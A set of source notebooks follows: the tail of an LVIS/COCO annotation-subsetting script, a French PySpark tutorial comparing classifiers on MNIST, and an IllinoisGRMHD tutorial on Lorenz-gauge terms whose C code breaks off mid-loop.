if _count_visible_keypoints(anno) >= min_keypoints_per_image:
return True
return False
class COCODataset(torchvision.datasets.coco.CocoDetection):
def __init__(self, root, ann_file, remove_images_without_annotations=False):
super(COCODataset, self).__init__(root, ann_file)
self.ids = sorted(self.ids)
# filter images without detection annotations
if remove_images_without_annotations:
ids = []
for img_id in self.ids:
# ann_ids = self.coco.getAnnIds(imgIds=img_id, catIds = id_gt,iscrowd=None)
ann_ids = self.coco.getAnnIds(imgIds=img_id, iscrowd=None)
anno = self.coco.loadAnns(ann_ids)
if has_valid_annotation(anno):
ids.append(img_id)
self.ids = ids
self.categories = {cat['id']: cat['name'] for cat in self.coco.cats.values()}
# self.json_category_id_to_contiguous_id = {
# v: i + 1 for i, v in enumerate(self.coco.getCatIds())
# }
# self.contiguous_category_id_to_json_id = {
# v: k for k, v in self.json_category_id_to_contiguous_id.items()
# }
self.id_to_img_map = {k: v for k, v in enumerate(self.ids)}
# self._transforms = transforms
def __getitem__(self, idx):
img, anno = super(COCODataset, self).__getitem__(idx)
return img, anno
def get_img_info(self, index):
img_id = self.id_to_img_map[index]
img_data = self.coco.imgs[img_id]
return img_data
coco = COCODataset(data_path,inst_gt_json_file, True)
# +
#构建只有108类所有标注的小数据集
inst_gt_subset = inst_gt.copy()
annotations_subset = []
for class_i in sorted_class_ids_top_b:
ann_list = coco.coco.getAnnIds(catIds=class_i)
annotations_subset.extend(coco.coco.loadAnns(ids=ann_list))
inst_gt_subset['annotations'] = annotations_subset
json.dump(inst_gt_subset, open(os.path.join(save_path, 'lvis_v0.5_'+stage+'_top'+str(b)+'.json'), 'w'))
# +
if stage == 'val':
for i in inst_gt_subset['categories']:
if i['id'] in sorted_cls_id[:b]:
i['step_state'] = 'b0'
elif i['id'] in sorted_cls_id[b:270+160]:
i['step_state'] = 't0'
else:
i['step_state'] = 't1'
json.dump(inst_gt_subset, open(os.path.join(save_path, 'lvis_v0.5_'+stage+'_top'+str(b)+'.json'), 'w'))
# -
|
train_top_b.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: PySpark
# language: python
# name: pyspark
# ---
# <center>
# <a href="http://www.insa-toulouse.fr/" ><img src="http://www.math.univ-toulouse.fr/~besse/Wikistat/Images/logo-insa.jpg" style="float:left; max-width: 120px; display: inline" alt="INSA"/></a>
#
# <a href="http://wikistat.fr/" ><img src="http://www.math.univ-toulouse.fr/~besse/Wikistat/Images/wikistat.jpg" style="max-width: 250px; display: inline" alt="Wikistat"/></a>
#
# <a href="http://www.math.univ-toulouse.fr/" ><img src="http://www.math.univ-toulouse.fr/~besse/Wikistat/Images/logo_imt.jpg" style="float:right; max-width: 200px; display: inline" alt="IMT"/> </a>
# </center>
# # [Ateliers: Technologies des grosses data](https://github.com/wikistat/Ateliers-Big-Data)
# # [Reconnaissance de caractères manuscrits](https://github.com/wikistat/Ateliers-Big-Data/2-MNIST) ([MNIST](http://yann.lecun.com/exdb/mnist/)) avec <a href="http://spark.apache.org/"><img src="http://spark.apache.org/images/spark-logo-trademark.png" style="max-width: 100px; display: inline" alt="Spark"/> </a>
# #### Résumé
# Présentation du problème de reconnaissance de caractères manuscrits ([MNIST DataBase](http://yann.lecun.com/exdb/mnist/) à partir d’images numérisées. L’objectif est de comparer les performances (qualité de prévision, temps d'exécution) en fonction de latechnologie, ici Spark et la librairie MLlib, et en fonction de la taille de l'échantillon. a principale limitation de Spark concerne la mémoire; répartie sur chaque noeud elle est vite insuffisante lorsque des grands modèles (beaoucp d'arbres d'une forêt aléatoire) doivent être archivés sur chacun de ceux-ci.
# ## 1 Introduction
# ### 1.1 Objetif
# L'objectif général est la construction d'un meilleur modèle de reconnaissance de chiffres manuscrits. Ce problème est ancien (zipcodes) et sert souvent de base pour la comparaison de méthodes et d'algorithmes d'apprentissage. Le site de <NAME>: [MNIST](http://yann.lecun.com/exdb/mnist/) DataBase, est à la source des données étudiées, il décrit précisément le problème et les modes d'acquisition. Il tenait à jour la liste des publications proposant des solutions avec la qualité de prévision obtenue. Ce problème a également été proposé comme sujet d'un concours [Kaggle](https://www.kaggle.com/competitions) mais sur un sous-ensemble des données.
#
# De façon très schématique, plusieurs stratégies sont développées dans une vaste littérature sur ces données.
#
# - Utiliser une méthode classique (k-nn, random forest...) sans trop raffiner mais avec des temps d'apprentissage rapide conduit à un taux d'erreur autour de 3\%.
# * Ajouter ou intégrer un pré-traitement des données permettant de recaler les images par des distorsions plus ou moins complexes.
# * Construire une mesure de distance adaptée au problème, par exemple invariante par rotation, translation, puis l'intégrer dans une technique d'apprentissage classique comme les $k$ plus proches voisins.
# * Utiliser une méthode plus flexibles (réseau de neurones épais) avec une optimisation fine des paramètres.
#
# L'objectif de cet atelier est de comparer sur des données relativement volumineuses les performances de différents environnements technologiques et librairies. Une dernière question est abordée, elle concerne l'influence de la taille de l'échantillon d'apprentissage sur le temps d'exécution ainsi que sur la qualité des prévisions.
#
#
# Analyse des données avec Spark, noter les temps d'exécution, la précision estimée sur l'échantillon test.
#
# ### 1.2 Lecture des données d'apprentissage et de test
# Les données peuvent être préalablement téléchargées ou directement lues. Ce sont celles originales du site [MNIST DataBase](http://yann.lecun.com/exdb/mnist/) mais préalablement converties au format .csv, certes plus volumineux mais plus facile à lire. Attention le fichier `mnist_train.zip` présent dans le dépôt est compressé.
sc
# Importation des packages
import time
from numpy import array
# Répertoire courant ou répertoire accessible de tous les "workers" du cluster
DATA_PATH=""
# ## Gestion des données
# ### Importation et transformation des données au format RDD
# Les données sont déjà partagée en une partie apprentissage et une test utilisée pour les comparaisons entre méthodes dans les publications. Ce sont bien les données du site MNIST mais transformée au format .csv pour en faciliter la lecture.
#
# Elles doivent être stockées à un emplacement accessibles de tous les noeuds du cluster pour permettre la construction de la base de données réparties (RDD).
#
# Dans une utilisation monoposte (*standalone*) de *Spark*, elles sont simplement chargées dans le répertoire courant.
# Chargement des fichiers
import urllib.request
f = urllib.request.urlretrieve("https://www.math.univ-toulouse.fr/~besse/Wikistat/data/mnist_train.csv",DATA_PATH+"mnist_train.csv")
f = urllib.request.urlretrieve("https://www.math.univ-toulouse.fr/~besse/Wikistat/data/mnist_test.csv",DATA_PATH+"mnist_test.csv")
# Transformation du fichier texte en RDD de valeurs
## Données d'apprentissage
# Transformation ou étape map de séparation des champs
trainRDD = sc.textFile(DATA_PATH+"mnist_train.csv").map(lambda l: [float(x) for x in l.split(',')])
# Action
trainRDD.count() # taille de l'échantillon
#test
# ### Conversion des données au format DataFrame
#
# Pour pouvoir être intérprété par les différentes méthodes de classification de la librairie SparkML, les données doivent être converties en objet DataFrame.
#
# Pour plus d'information sur l'utilisation de ces DataFrames, reportez vous aux calepins 1-Intro-PySpark/Cal3-PySpark-SQL.ipynb et 1-Intro-PySpark/Cal4-PySpark-Statelem&Pipeline-SparkML.ipynb
# +
# Transformation du de la RDD en DataFrame
from pyspark.sql import Row
from pyspark.ml.linalg import Vectors
#Cette fonction va permettre de transformer chaque ligne de la RDD en une "Row" pyspark.sql.
def list_to_Row(l):
#Creation d'un vecteur sparse pour les features
features = Vectors.sparse(784,dict([(i,v) for i,v in enumerate(l[:-1]) if v!=0]))
row = Row(label = l[-1], features= features)
return row
trainDF = trainRDD.map(list_to_Row).toDF()
# -
# Exemple de ligne
trainDF.take(1)[0]
## Même chose pour les données de test
testRDD = sc.textFile(DATA_PATH+'mnist_test.csv').map(lambda l: [float(x) for x in l.split(',')])
testRDD.count() # taille de l'échantillon
testDF = testRDD.map(list_to_Row).toDF()
testDF.take(1)
# ### Sous-échantillon d'apprentissage
# Extraction d'un sous-échantillon d'apprentissage pour tester les programmes sur des données plus petites. Itérer cette démarche permet d'étudier l'évolution de l'erreur de prévision en fonction de la taille de l'échantillon d'apprentissage.
tauxEch=0.1 # tester pour des tailles croissantes d'échantillon d'apprentissage
(trainData, DropDatal) = trainRDD.randomSplit([tauxEch, 1-tauxEch])
trainData.count()
# ## Méthode de classification
#
# Les méthodes de classifications de la librairie SparkML suivent le même shéma d'utilisation.
#
# Il faut dans un premier temps crée un objets **Estimators** pour configurer les paramètres de la méthode.
# Dans un second temps on réalise l'apprentissage en appliquant la fonction **fit** de l'Estimators sur la DataFrame d'apprentissage. Cette commande créé un objet différent, le **Transformers** qui permettra de réaliser les prédictions.
#
# Par défaut les différentes méthodes considère que les noms des colonnes correspondants aux variables et au prédicants du jeux d'apprentissage sont respectivement "features" et "label". Tandis que les prédictions seront automatiquement assigné à une colonne de nom "prediction".
# Il est conseillé de garder cette terminiologie, mais ces attributs par défaut peuvent être modifié en spécifiant les paramètres *featuresCol*, *labelCol* et *predictionCol* de chaque méthode.
# ### Régression logistique
# Exemple d'utilisation pour expliciter la syntaxe mais sans grand intérêt pour ces données qui ne satisfont pas à des frontières de discrimination linéaires. L'algorithme permettant de réaliser une regression logistique multinomial est l'algorithme [*softmax*](https://spark.apache.org/docs/latest/ml-classification-regression.html#multinomial-logistic-regression).
# +
### Logistic Regression
from pyspark.ml.classification import LogisticRegression
### Configuraiton des paramètres de la méthode
time_start=time.time()
lr = LogisticRegression(maxIter=100, regParam=0.01, fitIntercept=False, tol=0.0001,
family = "multinomial", elasticNetParam=0.0) #0 for L2 penalty, 1 for L1 penalty
### Génération du modèle
model_lr = lr.fit(trainDF)
time_end=time.time()
time_lrm=(time_end - time_start)
print("LR prend %d s" %(time_lrm)) # (104s avec taux=1)
# -
# #### Erreur sur l'échantillon test
predictionsRDD = model_lr.transform(testDF)
labelsAndPredictions = predictionsRDD.select("label","prediction").collect()
nb_good_prediction = sum([r[0]==r[1] for r in labelsAndPredictions])
nb_test = testDF.count()
testErr = 1-nb_good_prediction/nb_test
print('Test Error = ' + str(testErr)) # (0.08 avec taux =1)
# LogisticRegressionTrainingSummary provides a summary for a LogisticRegressionModel. Currently, only binary classification is supported. Support for multiclass model summaries will be added in the future.
# ### Arbre binaire de décision
# Même chose pour un arbre de discrimination. Comme pour l'implémentation de scikit-learn, les arbres ne peuvent être optimisés par un élagage basé sur une pénalisation de la complexité. Ce paramètre n'est pas présent, seule la profondeur max ou le nombre minimal d'observations par feuille peut contrôler la complexité. Noter l'apparition d'un nouveau paramètre: *maxBins* qui, schématiquement, rend qualitative ordinale à maxBins classes toute variable quantitative. D'autre part, il n'y a pas de représentation graphique. Cette implémentation d'arbre est issue d'un [projet Google](http://static.googleusercontent.com/media/research.google.com/fr//pubs/archive/36296.pdf) pour adapter cet algorithme aux contraintes *mapreduce* de données sous Hadoop. Elle vaut surtout pour permettre de construire une implémentation des forêts aléatoires.
# +
### Decision Tree
from pyspark.ml.classification import DecisionTreeClassifier
### Configuraiton des paramètres de la méthode
time_start=time.time()
dt = DecisionTreeClassifier(impurity='gini',maxDepth=5,maxBins=32, minInstancesPerNode=1,
minInfoGain=0.0)
### Génération du modèle
model_dt = dt.fit(trainDF)
time_end=time.time()
time_dt=(time_end - time_start)
print("DT takes %d s" %(time_dt))
# -
# #### Erreur sur l'échantillon test
predictionsRDD = model_dt.transform(testDF)
labelsAndPredictions = predictionsRDD.select("label","prediction").collect()
nb_good_prediction = sum([r[0]==r[1] for r in labelsAndPredictions])
nb_test = testDF.count()
testErr = 1-nb_good_prediction/nb_test
print('Test Error = ' + str(testErr))
# ### Random Forest
# Les $k$-nn ne sont pas "scalables" et donc pas présents. Voici la syntaxe et les paramètres associés à l'algorithme des forêts aléatoires. Parmi ceux "classiques" se trouvent *numTrees*, *featureSubsetStrategy*, *impurity*, *maxdepth* et en plus *maxbins* comme pour les arbres. Les valeurs du paramètres *maxDepth* est critique pour la qualité de la prévision. en principe, il n'est pas contraint, un arbre peut se déployer sans "limite" mais face à des données massives cela peut provoquer des plantages intempestifs.
# +
### Random Forest
from pyspark.ml.classification import RandomForestClassifier
### Configuraiton des paramètres de la méthode
time_start=time.time()
rf = RandomForestClassifier(numTrees = 2, impurity='gini', maxDepth=12,
maxBins=32, seed=None)
### Génération du modèle
model_rf = rf.fit(trainDF)
time_end=time.time()
time_rf=(time_end - time_start)
print("RF takes %d s" %(time_rf))#
# -
# #### Erreur sur l'échantillon test
# Erreur sur l'échantillon test
predictionsRDD = model_rf.transform(testDF)
labelsAndPredictions = predictionsRDD.select("label","prediction").collect()
nb_good_prediction = sum([r[0]==r[1] for r in labelsAndPredictions])
nb_test = testDF.count()
testErr = 1-nb_good_prediction/nb_test
print('Test Error = ' + str(testErr))
# Même traitement sur la totalité de l'échantillon
# ## 3 Quelques résultats
# 100 arbres, sélection automatique, maxDepth=9
#
# maxBins | Temps | Erreur
# --------|-------|---------
# 32 | 259 | 0.067
# 64 | 264 | 0.068
# 128 | 490 | 0.065
#
# 100 arbres, sélection automatique, maxBins=32
#
# maxDepth | Temps | Erreur
# ---------|-------|-------
# 4 | 55 | 0.21
# 9 | 259 | 0.067
# 18 | 983 | **0.035**
#
# Le nombre de variables tirées à chaque noeud n'a pas été optimisé.
#
# Le paramètre maxBins ne semble pas trop influencer la précision du modèle, au contriare de la profondeur maximum des arbres. Avec une profondeur suffisante, on retrouve (presque) les résultats classiques des forêts aléatoires sur ces données.
#
# COmparer les résultats obtenus pour les trois environnements.
|
MNIST/Atelier-pyspark-MNIST.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <script async src="https://www.googletagmanager.com/gtag/js?id=UA-59152712-8"></script>
# <script>
# window.dataLayer = window.dataLayer || [];
# function gtag(){dataLayer.push(arguments);}
# gtag('js', new Date());
#
# gtag('config', 'UA-59152712-8');
# </script>
#
# # Tutorial-IllinoisGRMHD: Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
#
# ## Authors: <NAME> & <NAME>
#
# <font color='red'>**This module is currently under development**</font>
#
# ## In this tutorial module we explain the construction of the right-hand side of the evolution equations of $\left[\sqrt{\gamma}\Phi\right]$ and add gauge terms to the right-hand side of the evolution equations of $A_{i}$
#
# ### Required and recommended citations:
#
# * **(Required)** <NAME>., <NAME>., <NAME>., <NAME>., and <NAME>. IllinoisGRMHD: an open-source, user-friendly GRMHD code for dynamical spacetimes. Class. Quantum Grav. 32 (2015) 175009. ([arxiv:1501.07276](http://arxiv.org/abs/1501.07276)).
# * **(Required)** <NAME>., <NAME>., <NAME>., <NAME>. Primitive Variable Solvers for Conservative General Relativistic Magnetohydrodynamics. Astrophysical Journal, 641, 626 (2006) ([astro-ph/0512420](https://arxiv.org/abs/astro-ph/0512420)).
# * **(Recommended)** <NAME>., <NAME>., <NAME>. An efficient shock-capturing central-type scheme for multidimensional relativistic flows - II. Magnetohydrodynamics. A&A 400 (2) 397-413 (2003). DOI: 10.1051/0004-6361:20021641 ([astro-ph/0210618](https://arxiv.org/abs/astro-ph/0210618)).
#
# If using the version of `IllinoisGRMHD` with piecewise polytropic *or* tabulated (coming soon!) EOS support, then the following citation is also required:
#
# * **(Required)** <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., and <NAME>., *IllinoisGRMHD github repository* (2019). Source Code URL: https://github.com/zachetienne/nrpytutorial/tree/master/IllinoisGRMHD/.
# <a id='toc'></a>
#
# # Table of Contents
# $$\label{toc}$$
#
# This module is organized as follows
#
# 0. [Step 0](#src_dir): **Source directory creation**
# 1. [Step 1](#lorenz_psi6phi_rhs__add_gauge_terms_to_a_i_rhs__c): **`Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C`**
# 1. [Step 1.a](#interpolations): *Performing all necessary interpolations*
# 1. [Step 1.a.i](#interpolation_algorithm): The interpolation algorithm
# 1. [Step 1.a.ii](#interp_and_alpha_phi_minus_betaj_A_j): Interpolating gridfunctions and computing $\left(\alpha\Phi-\beta^{j}A_{j}\right)$
# 1. [Step 1.b](#partial_t_a_i_gauge): *Computing $\partial_{t}A_{i}^{\rm gauge}$*
# 1. [Step 1.c](#shift_advection_terms): *Computing $\partial_{j}\beta^{j}\left[\sqrt{\gamma}\Phi\right]$*
# 1. [Step 1.d](#partial_j_alpha_psi6_aj): *Computing $-\partial_{j}\left(\alpha\sqrt{\gamma}A^{j}\right)-\xi\alpha\left[\sqrt{\gamma}\Phi\right]$*
# 1. [Step 1.e](#fct_avg): *The `avg()` function*
# 1. [Step 2](#code_validation): **Code validation**
# 1. [Step 3](#latex_pdf_output): **Output this notebook to $\LaTeX$-formatted PDF file**
# <a id='src_dir'></a>
#
# # Step 0: Source directory creation \[Back to [top](#toc)\]
# $$\label{src_dir}$$
#
# We will now use the [cmdline_helper.py NRPy+ module](Tutorial-Tutorial-cmdline_helper.ipynb) to create the source directory within the `IllinoisGRMHD` NRPy+ directory, if it does not exist yet.
# +
# Step 0: Creation of the IllinoisGRMHD source directory
# Step 0a: Add NRPy's directory to the path
# https://stackoverflow.com/questions/16780014/import-file-from-parent-directory
import os,sys
nrpy_dir_path = os.path.join("..","..")
if nrpy_dir_path not in sys.path:
sys.path.append(nrpy_dir_path)
# Step 0b: Load up cmdline_helper and create the directory
import cmdline_helper as cmd
outdir = os.path.join("..","src")
cmd.mkdir(outdir)
# -
# <a id='lorenz_psi6phi_rhs__add_gauge_terms_to_a_i_rhs__c'></a>
#
# # Step 1: The `Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C` file \[Back to [top](#toc)\]
# $$\label{lorenz_psi6phi_rhs__add_gauge_terms_to_a_i_rhs__c}$$
#
# In the `Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C` file we compute the gauge terms in $\partial_{t}A_{i}$, as well as the right-hand side of $\left[\sqrt{\gamma}\Phi\right]$, according to equations (16) and (17) of [Etienne *et al*.](https://arxiv.org/pdf/1501.07276.pdf):
#
# $$
# \begin{align}
# \partial_{t}A_{i}^{\rm gauge} &\equiv \partial_{t}A_{i} - \epsilon_{ijk}v^{j}\tilde{B}^{k} = -\partial_{i}\left(\alpha\Phi-\beta^{j}A_{j}\right)\ ,\\
# \partial_{t}\left[\sqrt{\gamma}\Phi\right] &= -\partial_{j}\left(\alpha\sqrt{\gamma}A^{j} - \beta^{j}\left[\sqrt{\gamma}\Phi\right]\right) - \xi\alpha\left[\sqrt{\gamma}\Phi\right]\ .
# \end{align}
# $$
# +
# %%writefile $outdir/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
static inline CCTK_REAL avg(CCTK_REAL f[PLUS2+1][PLUS2+1][PLUS2+1],int imin,int imax, int jmin,int jmax, int kmin,int kmax);
static void Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs(const cGH *cctkGH,const int *cctk_lsh,const int *cctk_nghostzones,CCTK_REAL *dX,CCTK_REAL **in_vars,CCTK_REAL *psi6phi,
CCTK_REAL *shiftx_iphjphkph,CCTK_REAL *shifty_iphjphkph,CCTK_REAL *shiftz_iphjphkph,
CCTK_REAL *alpha_iphjphkph,CCTK_REAL *alpha_Phi_minus_betaj_A_j_iphjphkph,CCTK_REAL *alpha_sqrtg_Ax_interp,
CCTK_REAL *alpha_sqrtg_Ay_interp,CCTK_REAL *alpha_sqrtg_Az_interp,
CCTK_REAL *psi6phi_rhs,CCTK_REAL *Ax_rhs,CCTK_REAL *Ay_rhs,CCTK_REAL *Az_rhs) {
DECLARE_CCTK_PARAMETERS;
/* Compute \partial_t psi6phi = -\partial_i ( \alpha psi^6 A^i - psi6phi \beta^i)
* (Eq 13 of http://arxiv.org/pdf/1110.4633.pdf), using Lorenz gauge.
* Note that the RHS consists of a shift advection term on psi6phi and
* a term depending on the vector potential.
* psi6phi is defined at (i+1/2,j+1/2,k+1/2), but instead of reconstructing
* to compute the RHS of \partial_t psi6phi, we instead use standard
* interpolations.
*/
CCTK_REAL dXm1=1.0/dX[0];
CCTK_REAL dYm1=1.0/dX[1];
CCTK_REAL dZm1=1.0/dX[2];
# -
# <a id='interpolations'></a>
#
# ## Step 1.a: Performing all necessary interpolations \[Back to [top](#toc)\]
# $$\label{interpolations}$$
# <a id='interpolation_algorithm'></a>
#
# ### Step 1.a.i: The interpolation algorithm \[Back to [top](#toc)\]
# $$\label{interpolation_algorithm}$$
#
# It is important to notice the different staggerrings. We are ultimately interested in the RHS of $\left[\sqrt{\gamma}\Phi\right]_{i,j,k}=\left[\psi^{6}\Phi\right]_{i,j,k}$, which is actually located at $\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$. Remember the staggerings:
#
# | Quantitity | Actual location on the grid |
# |:--------------------------------------:|:------------------------------------------------------:|
# | $\alpha_{i,j,k}$ | $\left(i,j,k\right)$ |
# | $\psi^{6}_{i,j,k}$ | $\left(i,j,k\right)$ |
# | $\left(A_{x}\right)_{i,j,k}$ | $\left(i,j+\frac{1}{2},k+\frac{1}{2}\right)$ |
# | $\left(A_{y}\right)_{i,j,k}$ | $\left(i+\frac{1}{2},j,k+\frac{1}{2}\right)$ |
# | $\left(A_{z}\right)_{i,j,k}$ | $\left(i+\frac{1}{2},j+\frac{1}{2},k\right)$ |
# |$\left[\sqrt{\gamma}\Phi\right]_{i,j,k}$|$\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$|
#
# To obtain the staggerings we use an interpolation routine which averages the value of the gridfunctions around the point of interest. For metric quantities, such as $\alpha$ and $\psi$, it is very easy to understand what is happening, so we will use them as the our main example.
#
# Because we are solving the equations in 3 spatial dimensions, our numerical grid can be seen as a collection of small "cubes" whose sizes are $\left(dx,dy,dz\right)$ (notice that, while we could have $dx\neq dy\neq dz$, we will refer to the grid as cubes to make it easier to describe it). Then, the metric quantities, which are unstaggered, are defined on the *vertices* of the cubes. On the other hand, $\left[\sqrt{\gamma}\Phi\right]$ is defined at the *centers* of the cubes. Thus, to obtain metric quantities on the center of the cube, we use a *averaging interpolation algorithm* which uses all 8 vertices of the cube.
#
# As a concrete example, we obtain the lapse at the grid location $\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$ by averaging
#
# $$
# \alpha_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} =
# \frac{
# \alpha_{i,j,k}+
# \alpha_{i+1,j,k}+
# \alpha_{i,j+1,k}+
# \alpha_{i,j,k+1}+
# \alpha_{i+1,j+1,k}+
# \alpha_{i+1,j,k+1}+
# \alpha_{i,j+1,k+1}+
# \alpha_{i+1,j+1,k+1}
# }
# {8}\ .
# $$
#
# However, our algorithm is not restricted to using 8 points when performing such an average. For example, suppose we need the quantity $\left(A_{x}\right)_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}}$, but we normaly only have $\left(A_{x}\right)_{i,j+\frac{1}{2},k+\frac{1}{2}}$. The average algorithm would then be
#
# $$
# \left(A_{x}\right)_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} = \frac{\left(A_{x}\right)_{i,j+\frac{1}{2},k+\frac{1}{2}} + \left(A_{x}\right)_{i+1,j+\frac{1}{2},k+\frac{1}{2}}}{2}\ .
# $$
# <a id='interp_and_alpha_phi_minus_betaj_A_j'></a>
#
# ### Step 1.a.ii: Interpolating gridfunctions and computing $\left(\alpha\Phi-\beta^{j}A_{j}\right)$ \[Back to [top](#toc)\]
# $$\label{interp_and_alpha_phi_minus_betaj_A_j}$$
#
# Now, to compute $\partial_{j}\left(\alpha\psi^{6}A^{j}\right)$ we need different interpolations for different quantitites. We will focus on the $x$-direction to give a concrete example.
#
# Consider, then, the term
#
# $$
# \partial_{x}\left(\alpha\psi^{6}A^{x}\right)\ .
# $$
#
# As we know, the second-order, centered finite differences approximation of this equation is
#
# $$
# \left[\partial_{x}\left(\alpha\psi^{6}A^{x}\right)\right]_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} = \frac{\left(\alpha\psi^{6}A^{x}\right)_{i+1,j+\frac{1}{2},k+\frac{1}{2}} - \left(\alpha\psi^{6}A^{x}\right)_{i,j+\frac{1}{2},k+\frac{1}{2}}}{dx}\ ,
# $$
#
# where the subscripts indicate ***the actual gridpoint location***. The $A_{x}$ staggering, then, already makes it available at the needed points for the derivative. However, we need to compute $A^{x} = g^{xi}A_{i} = \gamma^{xx}A_{x} + \gamma^{xy}A_{y} + \gamma^{xz}A_{z}$, which means that to compute $A^{x}$ alone we need to interpolate $\left(\gamma^{xx},\gamma^{xy},\gamma^{xz},A_{y},A_{z}\right)$ to the grid locations $\left(i,j+\frac{1}{2},k+\frac{1}{2}\right)$ and $\left(i+1,j+\frac{1}{2},k+\frac{1}{2}\right)$. On top of that, to be able to compute the derivative, we also need $\alpha$ and $\psi^{6}$ at those locations. Finally, once all interpolations have been performed, we can then add the appropriate terms to the RHSs of $\partial_{t}\left[\sqrt{\gamma}\Phi\right]$ and $\partial_{t}A_{i}$.
#
# The outline of the algorithm is as follows:
#
# 1. Read in gridfunctions at point $(i,j,k)$ and points around that, so that we can perform interpolations.
# 1. Interpolate $\alpha$ to the point $\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$
# 1. $A^{x}$ term:
# 1. Interpolate $\bar{\gamma}^{xx},\bar{\gamma}^{xy},\bar{\gamma}^{xz},\alpha,\psi$ to the point $\left(i,j+\frac{1}{2},k+\frac{1}{2}\right)$.
# 1. Interpolate $A_{x}$, $A_{y}$, $A_{z}$ to the point $\left(i,j+\frac{1}{2},k+\frac{1}{2}\right)$.
# 1. Compute $A^{x}$ at the point $\left(i,j+\frac{1}{2},k+\frac{1}{2}\right)$.
# 1. Compute $\alpha\psi^{6}A^{x}$ at the point $\left(i,j+\frac{1}{2},k+\frac{1}{2}\right)$.
# 1. $A^{y}$ term:
# 1. Interpolate $\bar{\gamma}^{xy},\bar{\gamma}^{yy},\bar{\gamma}^{yz},\alpha,\psi$ to the point $\left(i+\frac{1}{2},j,k+\frac{1}{2}\right)$.
# 1. Interpolate $A_{x}$, $A_{y}$, $A_{z}$ to the point $\left(i+\frac{1}{2},j,k+\frac{1}{2}\right)$.
# 1. Compute $A^{y}$ at the point $\left(i+\frac{1}{2},j,k+\frac{1}{2}\right)$.
# 1. Compute $\alpha\psi^{6}A^{y}$ at the point $\left(i+\frac{1}{2},j,k+\frac{1}{2}\right)$.
# 1. $A^{z}$ term:
# 1. Interpolate $\bar{\gamma}^{xz},\bar{\gamma}^{yz},\bar{\gamma}^{zz},\alpha,\psi$ to the point $\left(i+\frac{1}{2},j+\frac{1}{2},k\right)$.
# 1. Interpolate $A_{x}$, $A_{y}$, $A_{z}$ to the point $\left(i+\frac{1}{2},j+\frac{1}{2},k\right)$.
# 1. Compute $A^{z}$ at the point $\left(i+\frac{1}{2},j+\frac{1}{2},k\right)$.
# 1. Compute $\alpha\psi^{6}A^{z}$ at the point $\left(i+\frac{1}{2},j+\frac{1}{2},k\right)$.
# 1. Interpolate $A_{x},A_{y},A_{z}$ to the point $\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$.
# 1. Interpolate $\beta^{x},\beta^{y},\beta^{z}$ to the point $\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$.
# 1. Compute $\left(\alpha\Phi-\beta^{j}A_{j}\right)$ at $\left(i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}\right)$.
# %%writefile -a $outdir/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
// The stencil here is {-1,1},{-1,1},{-1,1} for x,y,z directions, respectively.
// Note that ALL input variables are defined at ALL gridpoints, so no
// worries about ghostzones.
#pragma omp parallel for
for(int k=1;k<cctk_lsh[2]-1;k++) for(int j=1;j<cctk_lsh[1]-1;j++) for(int i=1;i<cctk_lsh[0]-1;i++) {
int index=CCTK_GFINDEX3D(cctkGH,i,j,k);
CCTK_REAL INTERP_VARS[MAXNUMINTERP][PLUS2+1][PLUS2+1][PLUS2+1];
// First compute \partial_j \alpha \sqrt{\gamma} A^j (RHS of \partial_i psi6phi)
// FIXME: Would be much cheaper & easier to unstagger A_i, raise, then interpolate A^i.
// However, we keep it this way to be completely compatible with the original
// Illinois GRMHD thorn, called mhd_evolve.
//
//Step 1) j=x: Need to raise A_i, but to do that, we must have all variables at the same gridpoints:
// The goal is to compute \partial_j (\alpha \sqrt{\gamma} A^j) at (i+1/2,j+1/2,k+1/2)
// We do this by first interpolating (RHS1x) = (\alpha \sqrt{\gamma} A^x) at
// (i,j+1/2,k+1/2)and (i+1,j+1/2,k+1/2), then taking \partial_x (RHS1x) =
// [ RHS1x(i+1,j+1/2,k+1/2) - RHS1x(i,j+1/2,k+1/2) ]/dX.
// First bring gup's, psi, and alpha to (i,j+1/2,k+1/2):
int num_vars_to_interp;
int vars_to_interpolate[MAXNUMINTERP] = {INTERP_GAMMATILDEUPXX,INTERP_GAMMATILDEUPXY,INTERP_GAMMATILDEUPXZ,INTERP_GAMMATILDEUPYY,INTERP_GAMMATILDEUPYZ,INTERP_GAMMATILDEUPZZ,INTERP_LAPM1,INTERP_PSI,INTERP_SHIFTX,INTERP_SHIFTY,INTERP_SHIFTZ};
num_vars_to_interp = 11;
// We may set interp_limits to be more general than we need.
int interp_limits[6] = {-1,1,-1,1,-1,1}; SET_INDEX_ARRAYS_3DBLOCK(interp_limits);
//SET_INDEX_ARRAYS_3DBLOCK(interp_limits);
for(int ww=0;ww<num_vars_to_interp;ww++) {
int whichvar=vars_to_interpolate[ww];
// Read in variable at interp. stencil points from main memory, store in INTERP_VARS.
for(int kk=PLUS0;kk<=PLUS1;kk++) for(int jj=PLUS0;jj<=PLUS1;jj++) for(int ii=PLUS0;ii<=PLUS1;ii++) {
INTERP_VARS[whichvar][kk][jj][ii] = in_vars[whichvar][index_arr_3DB[kk][jj][ii]]; }
